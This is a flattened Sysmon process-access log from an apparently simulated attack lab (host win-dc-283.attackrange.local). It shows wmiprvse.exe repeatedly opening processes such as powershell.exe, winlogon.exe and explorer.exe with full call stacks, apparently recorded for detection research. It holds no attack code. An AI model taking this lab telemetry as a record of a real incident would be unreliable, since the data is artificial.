15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 